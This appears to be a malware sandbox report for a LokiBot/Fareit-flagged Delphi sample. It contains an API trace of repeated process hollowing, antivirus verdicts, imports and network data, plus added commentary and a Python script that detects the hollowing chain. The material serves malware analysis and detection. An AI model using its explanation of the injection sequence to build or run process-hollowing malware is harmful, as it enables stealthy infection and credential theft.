success 0 0
1619605692.5205
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3272
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605692.6925
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605692.6925
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3272
success 0 0
1619605693.4735
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3272
success 0 0
1619605694.2705
CreateProcessInternalW
thread_identifier: 3344
thread_handle: 0x00000120
process_identifier: 3340
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 3272 28902312
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605697.94325
CreateProcessInternalW
thread_identifier: 3456
thread_handle: 0x00000144
process_identifier: 3452
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000148
inherit_handles: 0
success 1 0
1619605699.28725
CreateProcessInternalW
thread_identifier: 3532
thread_handle: 0x0000011c
process_identifier: 3528
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605699.28725
NtUnmapViewOfSection
process_identifier: 3528
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605699.28725
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3528
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605699.39625
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605699.39625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3528
success 0 0
1619605700.16225
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3528
success 0 0
1619605701.63025
CreateProcessInternalW
thread_identifier: 3596
thread_handle: 0x00000120
process_identifier: 3592
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 3528 28909000
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605705.8325
CreateProcessInternalW
thread_identifier: 3720
thread_handle: 0x00000168
process_identifier: 3716
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000016c
inherit_handles: 0
success 1 0
1619605707.94325
CreateProcessInternalW
thread_identifier: 3792
thread_handle: 0x0000011c
process_identifier: 3788
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605707.94325
NtUnmapViewOfSection
process_identifier: 3788
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605707.95825
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3788
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605708.16225
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605708.17725
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3788
success 0 0
1619605708.97425
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3788
success 0 0
1619605709.83325
CreateProcessInternalW
thread_identifier: 3852
thread_handle: 0x00000120
process_identifier: 3848
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 3788 28917828
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605720.8175
CreateProcessInternalW
thread_identifier: 1948
thread_handle: 0x000001c0
process_identifier: 1320
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000001c4
inherit_handles: 0
success 1 0
1619605723.145625
CreateProcessInternalW
thread_identifier: 1056
thread_handle: 0x0000011c
process_identifier: 2032
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605723.145625
NtUnmapViewOfSection
process_identifier: 2032
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605723.207625
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 2032
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605723.379625
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619605723.395625
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5503936
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2032
success 0 0
1619605727.114625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2032
success 0 0
1619605727.286625
CreateProcessInternalW
thread_identifier: 2200
thread_handle: 0x00000120
process_identifier: 2440
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe" 2 2032 28935953
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619605732.614625
CreateProcessInternalW
thread_identifier: 3244
thread_handle: 0x00000154
process_identifier: 3240
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000158
inherit_handles: 0
success 1 0
1619605734.068
CreateProcessInternalW
thread_identifier: 3388
thread_handle: 0x0000011c
process_identifier: 3384
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\ghfjghfjhj.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619605734.068
NtUnmapViewOfSection
process_identifier: 3384
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619605734.083
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3384
commit_size: 1314816
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605734.146
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
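The repeated chain above (CreateProcessInternalW with CREATE_SUSPENDED, NtUnmapViewOfSection at the original image base 0x00400000, an RWX NtMapViewOfSection of 1314816 bytes at the same base, NtSetContextThread, then NtResumeThread) is the textbook process-hollowing sequence, performed once per relaunch of ghfjghfjhj.exe; the notepad.exe chain is the other pattern, an RWX NtAllocateVirtualMemory followed by WriteProcessMemory. The second copy is then started with the arguments `2 <hollowed PID> <number>`, and that third argument grows in step with the timestamps (28890843 to 28935953 over roughly 45 seconds), consistent with a millisecond tick count. The Python below is an added example, not part of this report or of the sandbox's own code: it parses the report's per-call blocks and classifies both chains. SAMPLE_TRACE is a constructed, abridged copy of the calls shown above, and the register reading (EAX holds the entry point and EBX the PEB address in the initial thread of a suspended 32-bit process) is the standard RunPE convention, not something the report states.

```python
"""Classify injection chains in a Cuckoo-style API trace.  Added example, not the
sandbox's own code; SAMPLE_TRACE is a constructed, abridged copy of the calls logged
above for PID 2208 (notepad.exe) and PID 2760 (ghfjghfjhj.exe), unused lines dropped."""
import re
from collections import defaultdict

SAMPLE_TRACE = """1619596028.189879
NtAllocateVirtualMemory
process_identifier: 2208
protection: 64 (PAGE_EXECUTE_READWRITE)
success 0 0
1619596028.189879
WriteProcessMemory
process_identifier: 2208
buffer: <shellcode bytes omitted>
success 1 0
1619605681.146
CreateProcessInternalW
process_identifier: 2760
creation_flags: 4 (CREATE_SUSPENDED)
success 1 0
1619605681.146
NtUnmapViewOfSection
process_identifier: 2760
base_address: 0x00400000
success 0 0
1619605681.177
NtMapViewOfSection
process_identifier: 2760
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
view_size: 1314816
base_address: 0x00400000
success 0 0
1619605681.349
NtSetContextThread
registers.eax: 5503936
registers.ebx: 2130567168
process_identifier: 2760
success 0 0
1619605682.005
NtResumeThread
process_identifier: 2760
success 0 0
"""
TIMESTAMP_RE = re.compile(r"^\d{10}\.\d+$")
CREATE_SUSPENDED, PAGE_EXECUTE_READWRITE = 0x4, 0x40
def num(v): return int(v.split()[0], 0)   # '64 (PAGE_EXECUTE_READWRITE)' -> 64, '0x00400000' -> 0x400000

def parse_trace(text):
    """Split the report's call blocks into {'time', 'api', 'args', 'status'} dicts."""
    calls, cur = [], None
    for line in (ln.strip() for ln in text.splitlines()):
        if TIMESTAMP_RE.match(line):          # a bare epoch timestamp opens a new block
            cur = {"time": float(line), "api": None, "args": {}, "status": None}
            calls.append(cur)
        elif not line or cur is None:
            continue
        elif cur["api"] is None:              # the line after the timestamp names the API
            cur["api"] = line
        elif line.startswith(("success ", "failed ")):
            cur["status"] = line.split()[0]
        else:
            key, _, value = line.partition(":")
            cur["args"][key.strip()] = value.strip()
    return calls

def in_order(apis, *names):                   # every name present, first occurrences ascending
    pos = [apis.index(n) for n in names if n in apis]
    return len(pos) == len(names) and pos == sorted(pos)

def detect_injection(text):
    """Return {target_pid: finding} for every PID whose memory another process rewrote."""
    by_pid = defaultdict(list)
    for call in parse_trace(text):
        if "process_identifier" in call["args"]:
            by_pid[int(call["args"]["process_identifier"])].append(call)
    findings = {}
    for pid, seq in by_pid.items():
        apis = [c["api"] for c in seq]
        def get(api, **want):                 # first call to `api` whose numeric args equal `want`
            return next((c for c in seq if c["api"] == api and
                         all(num(c["args"].get(k, "-1")) == v for k, v in want.items())), None)
        create, setctx = get("CreateProcessInternalW"), get("NtSetContextThread")
        rwx_map = get("NtMapViewOfSection", win32_protect=PAGE_EXECUTE_READWRITE)
        suspended = bool(create) and bool(num(create["args"]["creation_flags"]) & CREATE_SUSPENDED)
        if suspended and rwx_map and setctx and in_order(
                apis, "CreateProcessInternalW", "NtUnmapViewOfSection",
                "NtMapViewOfSection", "NtSetContextThread", "NtResumeThread"):
            # Process hollowing (RunPE).  On x86 the suspended initial thread carries the entry
            # point in EAX and the PEB in EBX, so the rewritten EAX must land inside the new image.
            base, size = num(rwx_map["args"]["base_address"]), num(rwx_map["args"]["view_size"])
            entry = int(setctx["args"]["registers.eax"])
            findings[pid] = {"technique": "process hollowing", "image_base": base, "entry_point": entry,
                             "entry_in_mapped_image": base <= entry < base + size,
                             "peb": int(setctx["args"]["registers.ebx"])}
        elif get("NtAllocateVirtualMemory", protection=PAGE_EXECUTE_READWRITE) and get("WriteProcessMemory"):
            findings[pid] = {"technique": "remote RWX allocation + WriteProcessMemory"}
    return findings
```

Run against the trace, `detect_injection` labels PID 2760 as process hollowing and PID 2208 as a remote RWX write. The decoded registers are the useful part for triage: EAX 5503936 is 0x53FBC0, which lies inside the mapped view [0x400000, 0x541000), so the resumed thread starts executing the freshly mapped payload rather than the original ghfjghfjhj.exe image; EBX 2130567168 is 0x7EFDE000, the PEB address commonly seen for 32-bit processes on Windows 7, which a RunPE loader leaves untouched and uses to patch the PEB's ImageBaseAddress field. The ordering check matters because NtGetContextThread/NtSetContextThread and NtResumeThread also occur in benign debuggers and installers; it is the suspended creation followed by an unmap and RWX remap at the image base that makes the chain unambiguous.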
File has been identified by 59 AntiVirus engines on VirusTotal as malicious (50 out of 59 events)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
ClamAV Win.Dropper.LokiBot-9089193-0
McAfee Fareit-FVZ!757BC8AB5108
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Malware
K7AntiVirus Trojan ( 0056b5241 )
Alibaba Trojan:Win32/DelfInject.ali2000015
K7GW Trojan ( 0056b5241 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Trojan.Delf.FareIt.Gen.7
Cyren W32/Trojan.ZNOJ-5662
Symantec Trojan.Gen.MBT
APEX Malicious
Avast Win32:PWSX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Backdoor.Win32.Androm.gen
BitDefender Trojan.Delf.FareIt.Gen.7
NANO-Antivirus Trojan.Win32.Androm.horyrb
Paloalto generic.ml
MicroWorld-eScan Trojan.Delf.FareIt.Gen.7
Ad-Aware Trojan.Delf.FareIt.Gen.7
Emsisoft Trojan.Delf.FareIt.Gen.7 (B)
Comodo Malware@#1ase7dxzpjg7o
F-Secure Trojan.TR/Kryptik.iypep
DrWeb Trojan.PWS.Stealer.28942
Zillya Trojan.Injector.Win32.752283
TrendMicro TrojanSpy.Win32.LOKI.SMAD1.hp
McAfee-GW-Edition BehavesLike.Win32.Fareit.dc
FireEye Generic.mg.757bc8ab5108fb1a
Sophos Mal/Generic-S + Troj/AutoG-IQ
Ikarus Trojan.Inject
Jiangmin Backdoor.Androm.axaq
Webroot W32.Malware.Gen
Avira TR/Kryptik.iypep
Antiy-AVL Trojan[Backdoor]/Win32.Androm
Kingsoft Win32.Hack.Undef.(kcloud)
Microsoft PWS:Win32/Fareit.AQ!MTB
AegisLab Trojan.Multi.Generic.4!c
ZoneAlarm HEUR:Backdoor.Win32.Androm.gen
GData Trojan.Delf.FareIt.Gen.7
AhnLab-V3 Suspicious/Win.Delphiless.X2094
Acronis suspicious
VBA32 TScope.Trojan.Delf
ALYac Trojan.Delf.FareIt.Gen.7
MAX malware (ai score=100)
Malwarebytes Spyware.LokiBot
ESET-NOD32 a variant of Win32/Injector.EMTN
TrendMicro-HouseCall TrojanSpy.Win32.LOKI.SMAD1.hp
Visualization
Binary image
No binary image: no binary visualization was generated for this sample
Runtime screenshots
No screenshots: no screenshots were captured while the sample ran

PE Compile Time

1992-06-20 06:22:17 (not a real build time: this is the fixed TimeDateStamp 0x2A425E19 that the Delphi linker writes into every PE it produces, 1992-06-19 22:22:17 UTC rendered here in UTC+8, and it is consistent with the Delphi-family verdicts above such as Trojan.Delf.FareIt.Gen.7 and TScope.Trojan.Delf)

Imports

Library kernel32.dll:
0x475178 VirtualFree
0x47517c VirtualAlloc
0x475180 LocalFree
0x475184 LocalAlloc
0x475188 GetVersion
0x47518c GetCurrentThreadId
0x475198 VirtualQuery
0x47519c WideCharToMultiByte
0x4751a0 MultiByteToWideChar
0x4751a4 lstrlenA
0x4751a8 lstrcpynA
0x4751ac LoadLibraryExA
0x4751b0 GetThreadLocale
0x4751b4 GetStartupInfoA
0x4751b8 GetProcAddress
0x4751bc GetModuleHandleA
0x4751c0 GetModuleFileNameA
0x4751c4 GetLocaleInfoA
0x4751c8 GetCommandLineA
0x4751cc FreeLibrary
0x4751d0 FindFirstFileA
0x4751d4 FindClose
0x4751d8 ExitProcess
0x4751dc WriteFile
0x4751e4 RtlUnwind
0x4751e8 RaiseException
0x4751ec GetStdHandle
Library user32.dll:
0x4751f4 GetKeyboardType
0x4751f8 LoadStringA
0x4751fc MessageBoxA
0x475200 CharNextA
Library advapi32.dll:
0x475208 RegQueryValueExA
0x47520c RegOpenKeyExA
0x475210 RegCloseKey
Library oleaut32.dll:
0x475218 SysFreeString
0x47521c SysReAllocStringLen
0x475220 SysAllocStringLen
Library kernel32.dll:
0x475228 TlsSetValue
0x47522c TlsGetValue
0x475230 LocalAlloc
0x475234 GetModuleHandleA
Library advapi32.dll:
0x47523c RegQueryValueExA
0x475240 RegOpenKeyExA
0x475244 RegCloseKey
Library kernel32.dll:
0x47524c lstrcpyA
0x475250 WriteFile
0x475254 WaitForSingleObject
0x475258 VirtualQuery
0x47525c VirtualAlloc
0x475260 Sleep
0x475264 SizeofResource
0x475268 SetThreadLocale
0x47526c SetFilePointer
0x475270 SetEvent
0x475274 SetErrorMode
0x475278 SetEndOfFile
0x47527c ResetEvent
0x475280 ReadFile
0x475284 MultiByteToWideChar
0x475288 MulDiv
0x47528c LockResource
0x475290 LoadResource
0x475294 LoadLibraryA
0x4752a0 GlobalUnlock
0x4752a4 GlobalSize
0x4752a8 GlobalReAlloc
0x4752ac GlobalHandle
0x4752b0 GlobalLock
0x4752b4 GlobalFree
0x4752b8 GlobalFindAtomA
0x4752bc GlobalDeleteAtom
0x4752c0 GlobalAlloc
0x4752c4 GlobalAddAtomA
0x4752c8 GetVersionExA
0x4752cc GetVersion
0x4752d0 GetUserDefaultLCID
0x4752d4 GetTickCount
0x4752d8 GetThreadLocale
0x4752dc GetSystemInfo
0x4752e0 GetStringTypeExA
0x4752e4 GetStdHandle
0x4752e8 GetProcAddress
0x4752ec GetModuleHandleA
0x4752f0 GetModuleFileNameA
0x4752f4 GetLocaleInfoA
0x4752f8 GetLocalTime
0x4752fc GetLastError
0x475300 GetFullPathNameA
0x475304 GetFileAttributesA
0x475308 GetDiskFreeSpaceA
0x47530c GetDateFormatA
0x475310 GetCurrentThreadId
0x475314 GetCurrentProcessId
0x475318 GetComputerNameA
0x47531c GetCPInfo
0x475320 GetACP
0x475324 FreeResource
0x475328 InterlockedExchange
0x47532c FreeLibrary
0x475330 FormatMessageA
0x475334 FindResourceA
0x475338 FindFirstFileA
0x47533c FindClose
0x475348 EnumCalendarInfoA
0x475354 CreateThread
0x475358 CreateFileA
0x47535c CreateEventA
0x475360 CompareStringA
0x475364 CloseHandle
Library version.dll:
0x47536c VerQueryValueA
0x475374 GetFileVersionInfoA
Library gdi32.dll:
0x47537c UnrealizeObject
0x475380 StretchBlt
0x475384 SetWindowOrgEx
0x475388 SetWinMetaFileBits
0x47538c SetViewportOrgEx
0x475390 SetTextColor
0x475394 SetStretchBltMode
0x475398 SetROP2
0x47539c SetPixel
0x4753a0 SetMapMode
0x4753a4 SetEnhMetaFileBits
0x4753a8 SetDIBColorTable
0x4753ac SetColorSpace
0x4753b0 SetBrushOrgEx
0x4753b4 SetBkMode
0x4753b8 SetBkColor
0x4753bc SelectPalette
0x4753c0 SelectObject
0x4753c4 SelectClipRgn
0x4753c8 SaveDC
0x4753cc RestoreDC
0x4753d0 Rectangle
0x4753d4 RectVisible
0x4753d8 RealizePalette
0x4753dc Polyline
0x4753e0 PlayEnhMetaFile
0x4753e4 PatBlt
0x4753e8 MoveToEx
0x4753ec MaskBlt
0x4753f0 LineTo
0x4753f4 LPtoDP
0x4753f8 IntersectClipRect
0x4753fc GetWindowOrgEx
0x475400 GetWinMetaFileBits
0x475404 GetTextMetricsA
0x475410 GetStockObject
0x475414 GetPixel
0x475418 GetPaletteEntries
0x47541c GetObjectA
0x47542c GetEnhMetaFileBits
0x475430 GetDeviceCaps
0x475434 GetDIBits
0x475438 GetDIBColorTable
0x47543c GetDCOrgEx
0x475444 GetClipBox
0x475448 GetBrushOrgEx
0x47544c GetBitmapBits
0x475450 ExcludeClipRect
0x475454 DeleteObject
0x475458 DeleteEnhMetaFile
0x47545c DeleteDC
0x475460 CreateSolidBrush
0x475464 CreatePenIndirect
0x475468 CreatePalette
0x475470 CreateFontIndirectA
0x475474 CreateEnhMetaFileA
0x475478 CreateDIBitmap
0x47547c CreateDIBSection
0x475480 CreateCompatibleDC
0x475488 CreateBrushIndirect
0x47548c CreateBitmap
0x475490 CopyEnhMetaFileA
0x475494 CloseEnhMetaFile
0x475498 BitBlt
Library user32.dll:
0x4754a0 CreateWindowExA
0x4754a4 WindowFromPoint
0x4754a8 WinHelpA
0x4754ac WaitMessage
0x4754b0 UpdateWindow
0x4754b4 UnregisterClassA
0x4754b8 UnhookWindowsHookEx
0x4754bc TranslateMessage
0x4754c4 TrackPopupMenu
0x4754cc ShowWindow
0x4754d0 ShowScrollBar
0x4754d4 ShowOwnedPopups
0x4754d8 ShowCursor
0x4754dc SetWindowsHookExA
0x4754e0 SetWindowPos
0x4754e4 SetWindowPlacement
0x4754e8 SetWindowLongA
0x4754ec SetTimer
0x4754f0 SetScrollRange
0x4754f4 SetScrollPos
0x4754f8 SetScrollInfo
0x4754fc SetRect
0x475500 SetPropA
0x475504 SetParent
0x475508 SetMenuItemInfoA
0x47550c SetMenu
0x475510 SetForegroundWindow
0x475514 SetFocus
0x475518 SetCursor
0x47551c SetClassLongA
0x475520 SetCapture
0x475524 SetActiveWindow
0x475528 SendMessageA
0x47552c ScrollWindow
0x475530 ScreenToClient
0x475534 RemovePropA
0x475538 RemoveMenu
0x47553c ReleaseDC
0x475540 ReleaseCapture
0x47554c RegisterClassA
0x475550 RedrawWindow
0x475554 PtInRect
0x475558 PostQuitMessage
0x47555c PostMessageA
0x475560 PeekMessageA
0x475564 OffsetRect
0x475568 OemToCharA
0x47556c MessageBoxA
0x475570 MapWindowPoints
0x475574 MapVirtualKeyA
0x475578 LoadStringA
0x47557c LoadKeyboardLayoutA
0x475580 LoadIconA
0x475584 LoadCursorA
0x475588 LoadBitmapA
0x47558c KillTimer
0x475590 IsZoomed
0x475594 IsWindowVisible
0x475598 IsWindowEnabled
0x47559c IsWindow
0x4755a0 IsRectEmpty
0x4755a4 IsIconic
0x4755a8 IsDialogMessageA
0x4755ac IsChild
0x4755b0 InvalidateRect
0x4755b4 IntersectRect
0x4755b8 InsertMenuItemA
0x4755bc InsertMenuA
0x4755c0 InflateRect
0x4755c8 GetWindowTextA
0x4755cc GetWindowRect
0x4755d0 GetWindowPlacement
0x4755d4 GetWindowLongA
0x4755d8 GetWindowDC
0x4755dc GetTopWindow
0x4755e0 GetSystemMetrics
0x4755e4 GetSystemMenu
0x4755e8 GetSysColorBrush
0x4755ec GetSysColor
0x4755f0 GetSubMenu
0x4755f4 GetScrollRange
0x4755f8 GetScrollPos
0x4755fc GetScrollInfo
0x475600 GetPropA
0x475604 GetParent
0x475608 GetWindow
0x47560c GetMessageTime
0x475610 GetMenuStringA
0x475614 GetMenuState
0x475618 GetMenuItemInfoA
0x47561c GetMenuItemID
0x475620 GetMenuItemCount
0x475624 GetMenu
0x475628 GetLastActivePopup
0x47562c GetKeyboardState
0x475634 GetKeyboardLayout
0x475638 GetKeyState
0x47563c GetKeyNameTextA
0x475640 GetIconInfo
0x475644 GetForegroundWindow
0x475648 GetFocus
0x47564c GetDlgItem
0x475650 GetDesktopWindow
0x475654 GetDCEx
0x475658 GetDC
0x47565c GetCursorPos
0x475660 GetCursor
0x475664 GetClipboardData
0x475668 GetClientRect
0x47566c GetClassNameA
0x475670 GetClassInfoA
0x475674 GetCapture
0x475678 GetActiveWindow
0x47567c FrameRect
0x475680 FindWindowA
0x475684 FillRect
0x475688 EqualRect
0x47568c EnumWindows
0x475690 EnumThreadWindows
0x475694 EndPaint
0x475698 EndDeferWindowPos
0x47569c EnableWindow
0x4756a0 EnableScrollBar
0x4756a4 EnableMenuItem
0x4756a8 DrawTextA
0x4756ac DrawMenuBar
0x4756b0 DrawIconEx
0x4756b4 DrawIcon
0x4756b8 DrawFrameControl
0x4756bc DrawEdge
0x4756c0 DispatchMessageA
0x4756c4 DestroyWindow
0x4756c8 DestroyMenu
0x4756cc DestroyIcon
0x4756d0 DestroyCursor
0x4756d4 DeleteMenu
0x4756d8 DeferWindowPos
0x4756dc DefWindowProcA
0x4756e0 DefMDIChildProcA
0x4756e4 DefFrameProcA
0x4756e8 CreatePopupMenu
0x4756ec CreateMenu
0x4756f0 CreateIcon
0x4756f4 ClientToScreen
0x4756f8 CheckMenuItem
0x4756fc CallWindowProcA
0x475700 CallNextHookEx
0x475704 BeginPaint
0x475708 BeginDeferWindowPos
0x47570c CharNextA
0x475710 CharLowerBuffA
0x475714 CharLowerA
0x475718 CharToOemA
0x47571c AdjustWindowRectEx
Library kernel32.dll:
0x475728 Sleep
Library oleaut32.dll:
0x475730 SafeArrayPtrOfIndex
0x475734 SafeArrayGetUBound
0x475738 SafeArrayGetLBound
0x47573c SafeArrayCreate
0x475740 VariantChangeType
0x475744 VariantCopy
0x475748 VariantClear
0x47574c VariantInit
Library ole32.dll:
0x475758 IsAccelerator
0x47575c OleDraw
0x475764 CoTaskMemFree
0x475768 ProgIDFromCLSID
0x47576c StringFromCLSID
0x475770 CoCreateInstance
0x475774 CoGetClassObject
0x475778 CoUninitialize
0x47577c CoInitialize
0x475780 IsEqualGUID
Library oleaut32.dll:
0x475788 GetErrorInfo
0x47578c GetActiveObject
0x475790 SysFreeString
Library comctl32.dll:
0x4757a0 ImageList_Write
0x4757a4 ImageList_Read
0x4757b4 ImageList_DragMove
0x4757b8 ImageList_DragLeave
0x4757bc ImageList_DragEnter
0x4757c0 ImageList_EndDrag
0x4757c4 ImageList_BeginDrag
0x4757c8 ImageList_Remove
0x4757cc ImageList_DrawEx
0x4757d0 ImageList_Replace
0x4757d4 ImageList_Draw
0x4757e4 ImageList_Add
0x4757ec ImageList_Destroy
0x4757f0 ImageList_Create
Library comdlg32.dll:
0x4757f8 GetOpenFileNameA
Library wsock32.dll:
0x475800 WSACleanup
0x475804 WSAStartup
0x475808 WSAGetLastError
0x47580c getservbyname
0x475810 gethostbyname
0x475814 socket
0x475818 shutdown
0x47581c ntohs
0x475820 ioctlsocket
0x475824 inet_addr
0x475828 htons
0x47582c connect
0x475830 closesocket

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.56.101 49713 114.114.114.114 53
192.168.56.101 50002 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 57874 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 62318 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 50534 224.0.0.252 5355
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57756 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 49714 239.255.255.250 3702
192.168.56.101 51966 239.255.255.250 1900

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.